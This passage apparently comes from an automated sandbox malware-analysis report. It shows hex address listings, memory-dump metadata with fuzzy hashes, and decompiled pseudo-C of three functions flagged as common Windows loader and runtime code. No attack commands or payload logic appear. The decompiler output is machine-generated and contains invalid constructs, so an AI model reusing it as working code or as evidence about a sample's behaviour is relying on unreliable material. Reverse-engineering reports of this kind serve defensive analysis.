                                      0x036d8709
                                      0x036d870b
                                      0x00000000
                                      0x00000000
                                      0x036d8711
                                      0x036d8725
                                      0x036d8727
                                      0x036d872a
                                      0x036d872c
                                      0x03729af0
                                      0x03729af5
                                      0x036d8732
                                      0x036d8732
                                      0x036d8732
                                      0x036d8735
                                      0x036d8737
                                      0x036d8515
                                      0x036d8515
                                      0x036d8518
                                      0x036d851d
                                      0x036d8523
                                      0x036d8527
                                      0x036d852b
                                      0x036d8537
                                      0x036d8539
                                      0x036d853c
                                      0x036d853e
                                      0x036d868c
                                      0x036d8691
                                      0x036d8699
                                      0x036d869b
                                      0x036d8744
                                      0x036d8748
                                      0x036d86a1
                                      0x036d86a1
                                      0x036d86a1
                                      0x036d86a4
                                      0x036d86a8
                                      0x03729bdf
                                      0x03729bdf
                                      0x036d86ae
                                      0x036d86b0
                                      0x00000000
                                      0x036d86b6
                                      0x00000000
                                      0x03729be9
                                      0x036d86b0
                                      0x036d8544
                                      0x036d854a
                                      0x036d854d
                                      0x036d8551
                                      0x036d876e
                                      0x036d8778
                                      0x036d877b
                                      0x036d8780
                                      0x036d8557
                                      0x036d8557
                                      0x036d855d
                                      0x036d855d
                                      0x036d856b
                                      0x036d856e
                                      0x036d8570
                                      0x036d8573
                                      0x036d8576
                                      0x036d8576
                                      0x036d8579
                                      0x036d857b
                                      0x00000000
                                      0x00000000
                                      0x036d8581
                                      0x036d85a0
                                      0x036d85a2
                                      0x036d85a5
                                      0x036d85a7
                                      0x03729b1b
                                      0x03729b1b
                                      0x036d862e
                                      0x036d862e
                                      0x036d8631
                                      0x036d8631
                                      0x036d8634
                                      0x036d8636
                                      0x036d8669
                                      0x036d8669
                                      0x036d866b
                                      0x03729bbf
                                      0x03729bc4
                                      0x03729bc8
                                      0x03729bce
                                      0x03729bce
                                      0x036d8671
                                      0x036d8671
                                      0x036d8674
                                      0x036d8676
                                      0x03729bae
                                      0x03729bae
                                      0x036d8676
                                      0x036d867c
                                      0x036d867e
                                      0x036d8688
                                      0x036d8688
                                      0x00000000
                                      0x036d867e
                                      0x036d8638
                                      0x036d8638
                                      0x036d863b
                                      0x036d863e
                                      0x036d863f
                                      0x036d8642
                                      0x036d8645
                                      0x036d8648
                                      0x036d864d
                                      0x03729b69
                                      0x03729b6e
                                      0x03729b7b
                                      0x03729b81
                                      0x03729b85
                                      0x03729b89
                                      0x03729ba7
                                      0x03729b8b
                                      0x03729b91
                                      0x03729b9a
                                      0x03729b9f
                                      0x03729b9f
                                      0x036d8788
                                      0x036d878d
                                      0x036d8763
                                      0x036d8763
                                      0x036d8766
                                      0x00000000
                                      0x036d8766
                                      0x03729b70
                                      0x00000000
                                      0x03729b70
                                      0x036d8656
                                      0x036d865a
                                      0x036d865c
                                      0x036d8752
                                      0x036d8756
                                      0x00000000
                                      0x00000000
                                      0x036d875e
                                      0x00000000
                                      0x036d875e
                                      0x036d8662
                                      0x036d8662
                                      0x036d8662
                                      0x036d8666
                                      0x00000000
                                      0x036d8666
                                      0x036d85b7
                                      0x036d85b9
                                      0x036d85bc
                                      0x036d85bf
                                      0x036d85cc
                                      0x036d85d1
                                      0x036d85d4
                                      0x036d85db
                                      0x036d85de
                                      0x036d85e0
                                      0x03729b5f
                                      0x00000000
                                      0x03729b5f
                                      0x036d85e6
                                      0x036d85ea
                                      0x036d86c3
                                      0x036d86c5
                                      0x036d86c8
                                      0x036d86ca
                                      0x03729b16
                                      0x00000000
                                      0x03729b16
                                      0x036d86d6
                                      0x036d85f6
                                      0x036d85f6
                                      0x036d85f9
                                      0x036d8602
                                      0x036d8606
                                      0x036d860a
                                      0x036d860b
                                      0x036d860e
                                      0x036d8611
                                      0x00000000
                                      0x036d8611
                                      0x036d85f3
                                      0x00000000
                                      0x036d85f3
                                      0x036d8619
                                      0x036d861e
                                      0x036d861e
                                      0x036d8621
                                      0x036d8622
                                      0x036d8623
                                      0x036d8625
                                      0x036d862c
                                      0x00000000
                                      0x036d873d
                                      0x00000000
                                      0x036d873d
                                      0x036d8737
                                      0x036d850f
                                      0x036d8512
                                      0x00000000
                                      0x036d8512
                                      0x00000000
                                      0x036d84d6

                                      Memory Dump Source
                                      • Source File: 00000010.00000002.485583016.00000000036A0000.00000040.00000001.sdmp, Offset: 036A0000, based on PE: true
                                      • Associated: 00000010.00000002.486108771.00000000037BB000.00000040.00000001.sdmp Download File
                                      • Associated: 00000010.00000002.486129834.00000000037BF000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 23f1929257cf7604aaea0f4a84e68254b68882a07093cb7052fb82dcaf33bfd7
                                      • Instruction ID: 2bf445653b1833bcbe4a80c62a5b35e7244f5425b0482a800a579610a505ea35
                                      • Opcode Fuzzy Hash: 23f1929257cf7604aaea0f4a84e68254b68882a07093cb7052fb82dcaf33bfd7
                                      • Instruction Fuzzy Hash: A9B16B74E00359DFCB18DFA9C988AAEBBB9BF49304F14412EE505AB345D770A855CF90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 036F513A, Relevance: .3, Instructions: 258COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 67%
                                      			E036F513A(intOrPtr __ecx, void* __edx) {
				signed int _v8;
				signed char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v63;
				char _v64;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed char* _v92;
				signed int _v100;
				signed int _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t157;
				signed int _t159;
				signed int _t160;
				unsigned int* _t161;
				intOrPtr _t165;
				signed int _t172;
				signed char* _t181;
				intOrPtr _t189;
				intOrPtr* _t200;
				signed int _t202;
				signed int _t203;
				char _t204;
				signed int _t207;
				signed int _t208;
				void* _t209;
				intOrPtr _t210;
				signed int _t212;
				signed int _t214;
				signed int _t221;
				signed int _t222;
				signed int _t226;
				intOrPtr* _t232;
				signed int _t233;
				signed int _t234;
				intOrPtr _t237;
				intOrPtr _t238;
				intOrPtr _t240;
				void* _t245;
				signed int _t246;
				signed int _t247;
				void* _t248;
				void* _t251;
				void* _t252;
				signed int _t253;
				signed int _t255;
				signed int _t256;

				_t255 = (_t253 & 0xfffffff8) - 0x6c;
				_v8 =  *0x37bd360 ^ _t255;
				_v32 = _v32 & 0x00000000;
				_t251 = __edx;
				_t237 = __ecx;
				_t212 = 6;
				_t245 =  &_v84;
				_t207 =  *((intOrPtr*)(__ecx + 0x48));
				_v44 =  *((intOrPtr*)(__edx + 0xc8));
				_v48 = __ecx;
				_v36 = _t207;
				_t157 = memset(_t245, 0, _t212 << 2);
				_t256 = _t255 + 0xc;
				_t246 = _t245 + _t212;
				if(_t207 == 2) {
					_t247 =  *(_t237 + 0x60);
					_t208 =  *(_t237 + 0x64);
					_v63 =  *((intOrPtr*)(_t237 + 0x4c));
					_t159 =  *((intOrPtr*)(_t237 + 0x58));
					_v104 = _t159;
					_v76 = _t159;
					_t160 =  *((intOrPtr*)(_t237 + 0x5c));
					_v100 = _t160;
					_v72 = _t160;
					L19:
					_v80 = _t208;
					_v84 = _t247;
					L8:
					_t214 = 0;
					if( *(_t237 + 0x74) > 0) {
						_t82 = _t237 + 0x84; // 0x124
						_t161 = _t82;
						_v92 = _t161;
						while( *_t161 >> 0x1f != 0) {
							_t200 = _v92;
							if( *_t200 == 0x80000000) {
								break;
							}
							_t214 = _t214 + 1;
							_t161 = _t200 + 0x10;
							_v92 = _t161;
							if(_t214 <  *(_t237 + 0x74)) {
								continue;
							}
							goto L9;
						}
						_v88 = _t214 << 4;
						_v40 = _t237 +  *((intOrPtr*)(_v88 + _t237 + 0x78));
						_t165 = 0;
						asm("adc eax, [ecx+edx+0x7c]");
						_v24 = _t165;
						_v28 = _v40;
						_v20 =  *((intOrPtr*)(_v88 + _t237 + 0x80));
						_t221 = _v40;
						_v16 =  *_v92;
						_v32 =  &_v28;
						if( *(_t237 + 0x4e) >> 0xf == 0) {
							goto L9;
						}
						_t240 = _v48;
						if( *_v92 != 0x80000000) {
							goto L9;
						}
						 *((intOrPtr*)(_t221 + 8)) = 0;
						 *((intOrPtr*)(_t221 + 0xc)) = 0;
						 *((intOrPtr*)(_t221 + 0x14)) = 0;
						 *((intOrPtr*)(_t221 + 0x10)) = _v20;
						_t226 = 0;
						_t181 = _t251 + 0x66;
						_v88 = 0;
						_v92 = _t181;
						do {
							if( *((char*)(_t181 - 2)) == 0) {
								goto L31;
							}
							_t226 = _v88;
							if(( *_t181 & 0x000000ff) == ( *(_t240 + 0x4e) & 0x7fff)) {
								_t181 = E0370D0F0(1, _t226 + 0x20, 0);
								_t226 = _v40;
								 *(_t226 + 8) = _t181;
								 *((intOrPtr*)(_t226 + 0xc)) = 0;
								L34:
								if(_v44 == 0) {
									goto L9;
								}
								_t210 = _v44;
								_t127 = _t210 + 0x1c; // 0x1c
								_t249 = _t127;
								E036E2280(_t181, _t127);
								 *(_t210 + 0x20) =  *( *[fs:0x18] + 0x24);
								_t185 =  *((intOrPtr*)(_t210 + 0x94));
								if( *((intOrPtr*)(_t210 + 0x94)) != 0) {
									L036E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t185);
								}
								_t189 = L036E4620(_t226,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v20 + 0x10);
								 *((intOrPtr*)(_t210 + 0x94)) = _t189;
								if(_t189 != 0) {
									 *((intOrPtr*)(_t189 + 8)) = _v20;
									 *( *((intOrPtr*)(_t210 + 0x94)) + 0xc) = _v16;
									_t232 =  *((intOrPtr*)(_t210 + 0x94));
									 *_t232 = _t232 + 0x10;
									 *(_t232 + 4) =  *(_t232 + 4) & 0x00000000;
									E0370F3E0( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x94)))), _v28, _v20);
									_t256 = _t256 + 0xc;
								}
								 *(_t210 + 0x20) =  *(_t210 + 0x20) & 0x00000000;
								E036DFFB0(_t210, _t249, _t249);
								_t222 = _v76;
								_t172 = _v80;
								_t208 = _v84;
								_t247 = _v88;
								L10:
								_t238 =  *((intOrPtr*)(_t251 + 0x1c));
								_v44 = _t238;
								if(_t238 != 0) {
									 *0x37bb1e0(_v48 + 0x38, _v36, _v63, _t172, _t222, _t247, _t208, _v32,  *((intOrPtr*)(_t251 + 0x20)));
									_v44();
								}
								_pop(_t248);
								_pop(_t252);
								_pop(_t209);
								return E0370B640(0, _t209, _v8 ^ _t256, _t238, _t248, _t252);
							}
							_t181 = _v92;
							L31:
							_t226 = _t226 + 1;
							_t181 =  &(_t181[0x18]);
							_v88 = _t226;
							_v92 = _t181;
						} while (_t226 < 4);
						goto L34;
					}
					L9:
					_t172 = _v104;
					_t222 = _v100;
					goto L10;
				}
				_t247 = _t246 | 0xffffffff;
				_t208 = _t247;
				_v84 = _t247;
				_v80 = _t208;
				if( *((intOrPtr*)(_t251 + 0x4c)) == _t157) {
					_t233 = _v72;
					_v105 = _v64;
					_t202 = _v76;
				} else {
					_t204 =  *((intOrPtr*)(_t251 + 0x4d));
					_v105 = 1;
					if(_v63 <= _t204) {
						_v63 = _t204;
					}
					_t202 = _v76 |  *(_t251 + 0x40);
					_t233 = _v72 |  *(_t251 + 0x44);
					_t247 =  *(_t251 + 0x38);
					_t208 =  *(_t251 + 0x3c);
					_v76 = _t202;
					_v72 = _t233;
					_v84 = _t247;
					_v80 = _t208;
				}
				_v104 = _t202;
				_v100 = _t233;
				if( *((char*)(_t251 + 0xc4)) != 0) {
					_t237 = _v48;
					_v105 = 1;
					if(_v63 <=  *((intOrPtr*)(_t251 + 0xc5))) {
						_v63 =  *((intOrPtr*)(_t251 + 0xc5));
						_t237 = _v48;
					}
					_t203 = _t202 |  *(_t251 + 0xb8);
					_t234 = _t233 |  *(_t251 + 0xbc);
					_t247 = _t247 &  *(_t251 + 0xb0);
					_t208 = _t208 &  *(_t251 + 0xb4);
					_v104 = _t203;
					_v76 = _t203;
					_v100 = _t234;
					_v72 = _t234;
					_v84 = _t247;
					_v80 = _t208;
				}
				if(_v105 == 0) {
					_v36 = _v36 & 0x00000000;
					_t208 = 0;
					_t247 = 0;
					 *(_t237 + 0x74) =  *(_t237 + 0x74) & 0;
					goto L19;
				} else {
					_v36 = 1;
					goto L8;
				}
			}































































                                      0x036f5142
                                      0x036f514c
                                      0x036f5150
                                      0x036f5157
                                      0x036f5159
                                      0x036f515e
                                      0x036f5165
                                      0x036f5169
                                      0x036f516c
                                      0x036f5172
                                      0x036f5176
                                      0x036f517a
                                      0x036f517a
                                      0x036f517a
                                      0x036f517f
                                      0x03736d8b
                                      0x03736d8e
                                      0x03736d91
                                      0x03736d95
                                      0x03736d98
                                      0x03736d9c
                                      0x03736da0
                                      0x03736da3
                                      0x03736da7
                                      0x03736e26
                                      0x03736e26
                                      0x03736e2a
                                      0x036f51f9
                                      0x036f51f9
                                      0x036f51fe
                                      0x03736e33
                                      0x03736e33
                                      0x03736e39
                                      0x03736e3d
                                      0x03736e46
                                      0x03736e50
                                      0x00000000
                                      0x00000000
                                      0x03736e52
                                      0x03736e53
                                      0x03736e56
                                      0x03736e5d
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x03736e5f
                                      0x03736e67
                                      0x03736e77
                                      0x03736e7f
                                      0x03736e80
                                      0x03736e88
                                      0x03736e90
                                      0x03736e9f
                                      0x03736ea5
                                      0x03736ea9
                                      0x03736eb1
                                      0x03736ebf
                                      0x00000000
                                      0x00000000
                                      0x03736ecf
                                      0x03736ed3
                                      0x00000000
                                      0x00000000
                                      0x03736edb
                                      0x03736ede
                                      0x03736ee1
                                      0x03736ee8
                                      0x03736eeb
                                      0x03736eed
                                      0x03736ef0
                                      0x03736ef4
                                      0x03736ef8
                                      0x03736efc
                                      0x00000000
                                      0x00000000
                                      0x03736f0d
                                      0x03736f11
                                      0x03736f32
                                      0x03736f37
                                      0x03736f3b
                                      0x03736f3e
                                      0x03736f41
                                      0x03736f46
                                      0x00000000
                                      0x00000000
                                      0x03736f4c
                                      0x03736f50
                                      0x03736f50
                                      0x03736f54
                                      0x03736f62
                                      0x03736f65
                                      0x03736f6d
                                      0x03736f7b
                                      0x03736f7b
                                      0x03736f93
                                      0x03736f98
                                      0x03736fa0
                                      0x03736fa6
                                      0x03736fb3
                                      0x03736fb6
                                      0x03736fbf
                                      0x03736fc1
                                      0x03736fd5
                                      0x03736fda
                                      0x03736fda
                                      0x03736fdd
                                      0x03736fe2
                                      0x03736fe7
                                      0x03736feb
                                      0x03736fef
                                      0x03736ff3
                                      0x036f520c
                                      0x036f520c
                                      0x036f520f
                                      0x036f5215
                                      0x036f5234
                                      0x036f523a
                                      0x036f523a
                                      0x036f5244
                                      0x036f5245
                                      0x036f5246
                                      0x036f5251
                                      0x036f5251
                                      0x03736f13
                                      0x03736f17
                                      0x03736f17
                                      0x03736f18
                                      0x03736f1b
                                      0x03736f1f
                                      0x03736f23
                                      0x00000000
                                      0x03736f28
                                      0x036f5204
                                      0x036f5204
                                      0x036f5208
                                      0x00000000
                                      0x036f5208
                                      0x036f5185
                                      0x036f5188
                                      0x036f518a
                                      0x036f518e
                                      0x036f5195
                                      0x03736db1
                                      0x03736db5
                                      0x03736db9
                                      0x036f519b
                                      0x036f519b
                                      0x036f519e
                                      0x036f51a7
                                      0x036f51a9
                                      0x036f51a9
                                      0x036f51b5
                                      0x036f51b8
                                      0x036f51bb
                                      0x036f51be
                                      0x036f51c1
                                      0x036f51c5
                                      0x036f51c9
                                      0x036f51cd
                                      0x036f51cd
                                      0x036f51d8
                                      0x036f51dc
                                      0x036f51e0
                                      0x03736dcc
                                      0x03736dd0
                                      0x03736dd5
                                      0x03736ddd
                                      0x03736de1
                                      0x03736de1
                                      0x03736de5
                                      0x03736deb
                                      0x03736df1
                                      0x03736df7
                                      0x03736dfd
                                      0x03736e01
                                      0x03736e05
                                      0x03736e09
                                      0x03736e0d
                                      0x03736e11
                                      0x03736e11
                                      0x036f51eb
                                      0x03736e1a
                                      0x03736e1f
                                      0x03736e21
                                      0x03736e23
                                      0x00000000
                                      0x036f51f1
                                      0x036f51f1
                                      0x00000000
                                      0x036f51f1

                                      Memory Dump Source
                                      • Source File: 00000010.00000002.485583016.00000000036A0000.00000040.00000001.sdmp, Offset: 036A0000, based on PE: true
                                      • Associated: 00000010.00000002.486108771.00000000037BB000.00000040.00000001.sdmp Download File
                                      • Associated: 00000010.00000002.486129834.00000000037BF000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0e7b2cb03bc10190862854ddc74941897286852d45065c5255f47063c010adf4
                                      • Instruction ID: bd27e98b1c920817b84b6050397923b3bd2da02703acedd8285ced7e5515ed8d
                                      • Opcode Fuzzy Hash: 0e7b2cb03bc10190862854ddc74941897286852d45065c5255f47063c010adf4
                                      • Instruction Fuzzy Hash: 54C130755093809FD354CF28C580A6AFBF1BF89304F188A6EF99A9B352D771E845CB42
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 036F03E2, Relevance: .3, Instructions: 254COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 74%
                                      			E036F03E2(signed int __ecx, signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				char _v52;
				char _v56;
				char _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t56;
				signed int _t58;
				char* _t64;
				intOrPtr _t65;
				signed int _t74;
				signed int _t79;
				char* _t83;
				intOrPtr _t84;
				signed int _t93;
				signed int _t94;
				signed char* _t95;
				signed int _t99;
				signed int _t100;
				signed char* _t101;
				signed int _t105;
				signed int _t119;
				signed int _t120;
				void* _t122;
				signed int _t123;
				signed int _t127;

				_v8 =  *0x37bd360 ^ _t127;
				_t119 = __ecx;
				_t105 = __edx;
				_t118 = 0;
				_v20 = __edx;
				_t120 =  *(__ecx + 0x20);
				if(E036F0548(__ecx, 0) != 0) {
					_t56 = 0xc000022d;
					L23:
					return E0370B640(_t56, _t105, _v8 ^ _t127, _t118, _t119, _t120);
				} else {
					_v12 = _v12 | 0xffffffff;
					_t58 = _t120 + 0x24;
					_t109 =  *(_t120 + 0x18);
					_t118 = _t58;
					_v16 = _t58;
					E036DB02A( *(_t120 + 0x18), _t118, 0x14a5);
					_v52 = 0x18;
					_v48 = 0;
					0x840 = 0x40;
					if( *0x37b7c1c != 0) {
					}
					_v40 = 0x840;
					_v44 = _t105;
					_v36 = 0;
					_v32 = 0;
					if(E036E7D50() != 0) {
						_t64 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t64 = 0x7ffe0384;
					}
					if( *_t64 != 0) {
						_t65 =  *[fs:0x30];
						__eflags =  *(_t65 + 0x240) & 0x00000004;
						if(( *(_t65 + 0x240) & 0x00000004) != 0) {
							_t100 = E036E7D50();
							__eflags = _t100;
							if(_t100 == 0) {
								_t101 = 0x7ffe0385;
							} else {
								_t101 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t101 & 0x00000020;
							if(( *_t101 & 0x00000020) != 0) {
								_t118 = _t118 | 0xffffffff;
								_t109 = 0x1485;
								E03747016(0x1485, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					_t105 = 0;
					while(1) {
						_push(0x60);
						_push(5);
						_push( &_v64);
						_push( &_v52);
						_push(0x100021);
						_push( &_v12);
						_t122 = E03709830();
						if(_t122 >= 0) {
							break;
						}
						__eflags = _t122 - 0xc0000034;
						if(_t122 == 0xc0000034) {
							L38:
							_t120 = 0xc0000135;
							break;
						}
						__eflags = _t122 - 0xc000003a;
						if(_t122 == 0xc000003a) {
							goto L38;
						}
						__eflags = _t122 - 0xc0000022;
						if(_t122 != 0xc0000022) {
							break;
						}
						__eflags = _t105;
						if(__eflags != 0) {
							break;
						}
						_t109 = _t119;
						_t99 = E037469A6(_t119, __eflags);
						__eflags = _t99;
						if(_t99 == 0) {
							break;
						}
						_t105 = _t105 + 1;
					}
					if( !_t120 >= 0) {
						L22:
						_t56 = _t120;
						goto L23;
					}
					if( *0x37b7c04 != 0) {
						_t118 = _v12;
						_t120 = E0374A7AC(_t119, _t118, _t109);
						__eflags = _t120;
						if(_t120 >= 0) {
							goto L10;
						}
						__eflags =  *0x37b7bd8;
						if( *0x37b7bd8 != 0) {
							L20:
							if(_v12 != 0xffffffff) {
								_push(_v12);
								E037095D0();
							}
							goto L22;
						}
					}
					L10:
					_push(_v12);
					_t105 = _t119 + 0xc;
					_push(0x1000000);
					_push(0x10);
					_push(0);
					_push(0);
					_push(0xf);
					_push(_t105);
					_t120 = E037099A0();
					if(_t120 < 0) {
						__eflags = _t120 - 0xc000047e;
						if(_t120 == 0xc000047e) {
							L51:
							_t74 = E03743540(_t120);
							_t119 = _v16;
							_t120 = _t74;
							L52:
							_t118 = 0x1485;
							E036CB1E1(_t120, 0x1485, 0, _t119);
							goto L20;
						}
						__eflags = _t120 - 0xc000047f;
						if(_t120 == 0xc000047f) {
							goto L51;
						}
						__eflags = _t120 - 0xc0000462;
						if(_t120 == 0xc0000462) {
							goto L51;
						}
						_t119 = _v16;
						__eflags = _t120 - 0xc0000017;
						if(_t120 != 0xc0000017) {
							__eflags = _t120 - 0xc000009a;
							if(_t120 != 0xc000009a) {
								__eflags = _t120 - 0xc000012d;
								if(_t120 != 0xc000012d) {
									_v28 = _t119;
									_push( &_v56);
									_push(1);
									_v24 = _t120;
									_push( &_v28);
									_push(1);
									_push(2);
									_push(0xc000007b);
									_t79 = E0370AAF0();
									__eflags = _t79;
									if(_t79 >= 0) {
										__eflags =  *0x37b8474 - 3;
										if( *0x37b8474 != 3) {
											 *0x37b79dc =  *0x37b79dc + 1;
										}
									}
								}
							}
						}
						goto L52;
					}
					if(E036E7D50() != 0) {
						_t83 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t83 = 0x7ffe0384;
					}
					if( *_t83 != 0) {
						_t84 =  *[fs:0x30];
						__eflags =  *(_t84 + 0x240) & 0x00000004;
						if(( *(_t84 + 0x240) & 0x00000004) != 0) {
							_t94 = E036E7D50();
							__eflags = _t94;
							if(_t94 == 0) {
								_t95 = 0x7ffe0385;
							} else {
								_t95 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t95 & 0x00000020;
							if(( *_t95 & 0x00000020) != 0) {
								E03747016(0x1486, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					if(( *(_t119 + 0x10) & 0x00000100) == 0) {
						if( *0x37b8708 != 0) {
							_t118 =  *0x7ffe0330;
							_t123 =  *0x37b7b00; // 0x0
							asm("ror esi, cl");
							 *0x37bb1e0(_v12, _v20, 0x20);
							_t93 =  *(_t123 ^  *0x7ffe0330)();
							_t50 = _t93 + 0x3ffffddb; // 0x3ffffddb
							asm("sbb esi, esi");
							_t120 =  ~_t50 & _t93;
						} else {
							_t120 = 0;
						}
					}
					if( !_t120 >= 0) {
						L19:
						_push( *_t105);
						E037095D0();
						 *_t105 =  *_t105 & 0x00000000;
						goto L20;
					}
					_t120 = E036D7F65(_t119);
					if( *((intOrPtr*)(_t119 + 0x60)) != 0) {
						__eflags = _t120;
						if(_t120 < 0) {
							goto L19;
						}
						 *(_t119 + 0x64) = _v12;
						goto L22;
					}
					goto L19;
				}
			}








































                                      0x036f03f1
                                      0x036f03f7
                                      0x036f03f9
                                      0x036f03fb
                                      0x036f03fd
                                      0x036f0400
                                      0x036f040a
                                      0x03734c7a
                                      0x036f0537
                                      0x036f0547
                                      0x036f0410
                                      0x036f0410
                                      0x036f0414
                                      0x036f0417
                                      0x036f041a
                                      0x036f0421
                                      0x036f0424
                                      0x036f042b
                                      0x036f043b
                                      0x036f043e
                                      0x036f043f
                                      0x036f043f
                                      0x036f0446
                                      0x036f0449
                                      0x036f044c
                                      0x036f044f
                                      0x036f0459
                                      0x03734c8d
                                      0x036f045f
                                      0x036f045f
                                      0x036f045f
                                      0x036f0467
                                      0x03734c97
                                      0x03734c9d
                                      0x03734ca4
                                      0x03734caa
                                      0x03734caf
                                      0x03734cb1
                                      0x03734cc3
                                      0x03734cb3
                                      0x03734cbc
                                      0x03734cbc
                                      0x03734cc8
                                      0x03734ccb
                                      0x03734cd7
                                      0x03734cda
                                      0x03734cdf
                                      0x03734cdf
                                      0x03734ccb
                                      0x03734ca4
                                      0x036f046d
                                      0x036f046f
                                      0x036f046f
                                      0x036f0471
                                      0x036f0476
                                      0x036f047a
                                      0x036f047b
                                      0x036f0483
                                      0x036f0489
                                      0x036f048d
                                      0x00000000
                                      0x00000000
                                      0x03734ce9
                                      0x03734cef
                                      0x03734d22
                                      0x03734d22
                                      0x00000000
                                      0x03734d22
                                      0x03734cf1
                                      0x03734cf7
                                      0x00000000
                                      0x00000000
                                      0x03734cf9
                                      0x03734cff
                                      0x00000000
                                      0x00000000
                                      0x03734d05
                                      0x03734d07
                                      0x00000000
                                      0x00000000
                                      0x03734d0d
                                      0x03734d0f
                                      0x03734d14
                                      0x03734d16
                                      0x00000000
                                      0x00000000
                                      0x03734d1c
                                      0x03734d1c
                                      0x036f0499
                                      0x036f0535
                                      0x036f0535
                                      0x00000000
                                      0x036f0535
                                      0x036f04a6
                                      0x03734d2c
                                      0x03734d37
                                      0x03734d39
                                      0x03734d3b
                                      0x00000000
                                      0x00000000
                                      0x03734d41
                                      0x03734d48
                                      0x036f0527
                                      0x036f052b
                                      0x036f052d
                                      0x036f0530
                                      0x036f0530
                                      0x00000000
                                      0x036f052b
                                      0x03734d4e
                                      0x036f04ac
                                      0x036f04ac
                                      0x036f04af
                                      0x036f04b2
                                      0x036f04b7
                                      0x036f04b9
                                      0x036f04bb
                                      0x036f04bd
                                      0x036f04bf
                                      0x036f04c5
                                      0x036f04c9
                                      0x03734d53
                                      0x03734d59
                                      0x03734db9
                                      0x03734dba
                                      0x03734dbf
                                      0x03734dc2
                                      0x03734dc4
                                      0x03734dc7
                                      0x03734dce
                                      0x00000000
                                      0x03734dce
                                      0x03734d5b
                                      0x03734d61
                                      0x00000000
                                      0x00000000
                                      0x03734d63
                                      0x03734d69
                                      0x00000000
                                      0x00000000
                                      0x03734d6b
                                      0x03734d6e
                                      0x03734d74
                                      0x03734d76
                                      0x03734d7c
                                      0x03734d7e
                                      0x03734d84
                                      0x03734d89
                                      0x03734d8c
                                      0x03734d8d
                                      0x03734d92
                                      0x03734d95
                                      0x03734d96
                                      0x03734d98
                                      0x03734d9a
                                      0x03734d9f
                                      0x03734da4
                                      0x03734da6
                                      0x03734da8
                                      0x03734daf
                                      0x03734db1
                                      0x03734db1
                                      0x03734daf
                                      0x03734da6
                                      0x03734d84
                                      0x03734d7c
                                      0x00000000
                                      0x03734d74
                                      0x036f04d6
                                      0x03734de1
                                      0x036f04dc
                                      0x036f04dc
                                      0x036f04dc
                                      0x036f04e4
                                      0x03734deb
                                      0x03734df1
                                      0x03734df8
                                      0x03734dfe
                                      0x03734e03
                                      0x03734e05
                                      0x03734e17
                                      0x03734e07
                                      0x03734e10
                                      0x03734e10
                                      0x03734e1c
                                      0x03734e1f
                                      0x03734e35
                                      0x03734e35
                                      0x03734e1f
                                      0x03734df8
                                      0x036f04f1
                                      0x036f04fa
                                      0x03734e3f
                                      0x03734e47
                                      0x03734e5b
                                      0x03734e61
                                      0x03734e67
                                      0x03734e69
                                      0x03734e71
                                      0x03734e73
                                      0x036f0500
                                      0x036f0500
                                      0x036f0500
                                      0x036f04fa
                                      0x036f0508
                                      0x036f051d
                                      0x036f051d
                                      0x036f051f
                                      0x036f0524
                                      0x00000000
                                      0x036f0524
                                      0x036f0515
                                      0x036f0517
                                      0x03734e7a
                                      0x03734e7c
                                      0x00000000
                                      0x00000000
                                      0x03734e85
                                      0x00000000
                                      0x03734e85
                                      0x00000000
                                      0x036f0517

                                      Memory Dump Source
                                      • Source File: 00000010.00000002.485583016.00000000036A0000.00000040.00000001.sdmp, Offset: 036A0000, based on PE: true
                                      • Associated: 00000010.00000002.486108771.00000000037BB000.00000040.00000001.sdmp Download File
                                      • Associated: 00000010.00000002.486129834.00000000037BF000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d20298f663cf38c844bbc8f4188a404cfecbec4840043d81dd38dd04283c09df
                                      • Instruction ID: f9ab9118f53715aa54ad1b98a23e2a6ec37dd3df4068bbf25a9dc55f30db3e84
                                      • Opcode Fuzzy Hash: d20298f663cf38c844bbc8f4188a404cfecbec4840043d81dd38dd04283c09df
                                      • Instruction Fuzzy Hash: 69913731E00758EFDB35DB69C948BBDBBA4EF02724F0902A5EA51AB2D2D7749D00C791
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 036CC600, Relevance: .2, Instructions: 225COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 67%
                                      			E036CC600(intOrPtr _a4, intOrPtr _a8, signed int _a12, signed char _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				char _v1036;
				signed int _v1040;
				char _v1048;
				signed int _v1052;
				signed char _v1056;
				void* _v1058;
				char _v1060;
				signed int _v1064;
				void* _v1068;
				intOrPtr _v1072;
				void* _v1084;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t70;
				intOrPtr _t72;
				signed int _t74;
				intOrPtr _t77;
				signed int _t78;
